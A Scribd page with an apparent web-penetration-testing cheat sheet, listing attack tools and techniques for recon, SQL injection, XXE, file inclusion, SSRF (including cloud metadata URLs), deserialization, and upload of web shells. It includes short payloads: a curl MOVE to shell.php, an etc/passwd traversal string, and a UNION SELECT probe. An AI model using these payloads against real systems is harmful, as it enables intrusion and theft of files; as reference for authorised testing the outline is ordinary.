Scribd
Upload
321 views2 pages

Comprehensive Web Hacking Guide

This document provides links to tools and resources for web hacking, including CyberChef for encoding/decoding data, DE4JS for analyzing JavaScript, and XCAT for exploring Linux systems. It also outlines techniques for reconnaissance, content discovery, identifying web technologies, subdomain enumeration, exploiting HTTP verbs and headers, and converting between XML and JSON formats. The overall focus is on methodologies for attacking and assessing security of web applications and servers.

Uploaded by

Crazy Jack
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
321 views2 pages

Comprehensive Web Hacking Guide

This document provides links to tools and resources for web hacking, including CyberChef for encoding/decoding data, DE4JS for analyzing JavaScript, and XCAT for exploring Linux systems. It also outlines techniques for reconnaissance, content discovery, identifying web technologies, subdomain enumeration, exploiting HTTP verbs and headers, and converting between XML and JSON formats. The overall focus is on methodologies for attacking and assessing security of web applications and servers.

Uploaded by

Crazy Jack
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

https://gchq.github.

io/CyberChef/ 

https://lelinhtinh.github.io/de4js/ 

https://xcat.readthedocs.io/en/latest/ 

https://github.com/detectify/page-fetch 

OXML_XXE (https://github.com/BuffaloWill/
oxml_xxe)

https://github.com/swisskyrepo/
PayloadsAllTheThings

wpscan 

https://book.hacktricks.xyz 
Cheat Sheets Tools Droopescan 

https://maxtoroq.github.io/xpath-ref/  WEB HACKING CMSmap 

https://0xsp.com/  CMSeeK 

Reconnaissance WPXF 

Content Discovery joomscan 

JoomlaVS 

Identify Web technology Drupwn 

https://github.com/wireghoul/htshells 

Wappalyzer

Common filetypes

html

php

aspx

txt

js

feroxbuster / gobuster

Review JavaScript Files

https://lelinhtinh.github.io/de4js/

Review HTML code

Spiders

gospider

Identify directory and filename patterns

Read metadata of files (PDF/Images) to


identify Author, E-mails, Software used

Subdomain Enumeration

SSL

Google Dorks

Bruteforce

gobuster dns

ffuf -H "Host: FUZZ.domain.com"

amass

HTTP VERBS

OPTIONS

GET

POST

PUT

DELETE

curl -X MOVE --header 'Destination:http://$


MOVE
ip/shell.php' 'http://$ip/shell.txt'

PATCH

INSERT (ARBITRARY VALUE) Setting arbitrary HTTP verb


might force the Web Server
HELP to disclose information.

Change Request Method

Provide parameters in GET

Change Content-Type

JSON => XML

https://codebeautify.org/xmltojson

https://www.oxygenxml.com/xml_json_
converter.html

HTTP Headers

Common Headers

X-Requested-For

X-Real-IP

X-Forwarded-Host

X-Client-IP

X-Forwarded-By

X-Remote-Addr

X-Remote-IP

X-Wap-Profile: <URL-to-XML-file>

Custom Headers

BurpCollaboratorEverywhere (SSRF)

Differrent User-Agent

Windows

Linux

Android

Custom Value (injection?)

Duplicate Host Header

Some implementations might be parsing


HTTP Headers like "User-Agent" in an
insecure manner

Command Injection

Shellshock

SSRF

BurpCollaboratorEverywhere

SQLi

Origin overwrite

HTTP Parameters

ParamMiner

HTTP Parameter Pollution

id=1&id=2

Password Reset

User Enumeration

Missing Rate Limiting

Password Reset Poisoning via Host Header


Injection

Re-usable Password Reset Token

No Expiration on Password Reset Token

Guessable Password Reset Token

IDN Homograph Attack

Weak Password Policy

Information Disclosure

Generate an error

Special characters

HTTP Parameters

Change type to array ( ?id= to ?id[]= )

Missing parameters

Parameter Pollution

Non existing page => 404

Very long session/cookies

HTML code review

JS code review

Search for ".map" files

https://lelinhtinh.github.io/de4js/

Path Traversal

NGINX

nginx.conf

location /path misconfiguration

vulnerable.site/path..%2f..%2f..%2f..%
2fetc%2fpasswd

Filter Bypass

Unicode

Codepoints: &#32;

URL Encoding: %2e%2e%2f

Web Servers

Apache

/etc/apache2/apache2.conf

/etc/apache2/envvars

/etc/apache2/sites-enabled/000-default.
conf

/var/log/apache2/error.log

NGINX

/etc/nginx/nginx.conf

/etc/nginx/locations.conf

/etc/nginx/server.conf

/etc/nginx/sites-enabled/default

NodeJS

var http = require('http');

LDAP Injection

XPATH Injection

https://xcat.readthedocs.io/en/latest/ 

https://maxtoroq.github.io/xpath-ref/ 

OS Command Injection

SQL Injection

Identify number of columns

UNION SELECT NULL, NULL, NULL, NULL; -- -

Identify columns data types and which


columns are visible

Identify Database type (MySQL,


PostgreSQL, ...) and version

sqlmap

NOSQL Injection

XML eXternal Entities (XXE)

OOB (Out of Band)

xxe.sh

OXML_XXE (https://github.com/BuffaloWill/
oxml_xxe)

OOXML (DOCX, XLSX, PPTX), ODF, PDF, RSS

File Inclusion (LFI/RFI)

Wrappers

phar://
Access archives
zlib://

file://

ogg://

expect://

glob:// File pattern matching

data://

php://

php://filter/convert.base64-encode/
resource=

Log Poisoning

Session Poisoning

Interesting Files

Race Conditions (TOCTOU)

Template Injection (SSTI)

Python

Jinja2

PHP

Twig

Server Side Request Forgery (


SSRF)

gopher:// URL Scheme

Filter Bypass

127.0.0.1.nip.io

localhost == [::]

decimal notation 127.0.0.1 == 2130706433

IPv6/IPv4 Embedding [0:0:0:0:0:ffff:127.0.0.


1]

Cloud

AWS http://169.254.169.254/latest/meta-
data

Alibaba http://100.100.100.200/latest/meta-
data/

Oracle Cloud http://192.0.0.192/latest/meta-


data/

Digital Ocean http://169.254.169.254/


metadata/v1.json

Request Smuggling

Smuggler

Insecure Deserialization

Check all user controlled input

Cookies / Sessions
The application would need to deserialize
untrusted user input
HTTP Parameters

HTTP Headers

Remote Method Invocation (RMI)

Python

Pickle

PyYAML load

Java

Magic Numbers "AC ED 00 05"

Java-Deserialization-Cheat-Sheet

ysoserial

XMLDecoder

XStream->fromXML

ObjectInputStream

ObjectInputStream->readExternal

ObjectInputStream->readResolve

ObjectInputStream->readObject

ObjectInputStream->readUnshared

Content-Type: application/x-java-serialized-
object

Ruby

unmarshal

PHP

unserialize

phpggc

Cross Site Scripting (XSS)

Same Origin Policy (SOP)

Cross Origin Resource Sharing (CORS)

Check for Request Splitting

Add CORS related HTTP Header to allow


XSS

File Upload

WebDAV

cadaver

davtest [-auth user:password] -move -


davtest
sendbd auto -url http://<IP>

curl -T file.txt http://<IP>

curl -X MOVE --header 'Destination:http://$


HTTP MOVE
ip/shell.php' 'http://$ip/shell.txt'

web.config (ASP.NET)

Make specific file extensions executable (e.


g: execute txt files)

https://soroush.secproject.com/blog/2014/
07/upload-a-web-config-file-for-fun-profit/

.htaccess (Apache)

Make specific file extensions executable (e.


g: execute txt files)

https://github.com/wireghoul/htshells 

Content-Type filter bypass

Magic Bytes filter bypass

Double Extensions filter bypass

Alternative extensions blacklist filter bypass

Prototype Pollution

https://github.com/detectify/page-fetch 

Content Management Systems (


CMS)

Wordpress

wpscan 

Droopescan 

CMSmap 

CMSeeK 

WPXF 

Joomla

joomscan 

Droopescan 

CMSmap 

CMSeeK 

JoomlaVS 

Drupal

Droopescan 

CMSmap 

Drupwn 

CMSeeK 

You might also like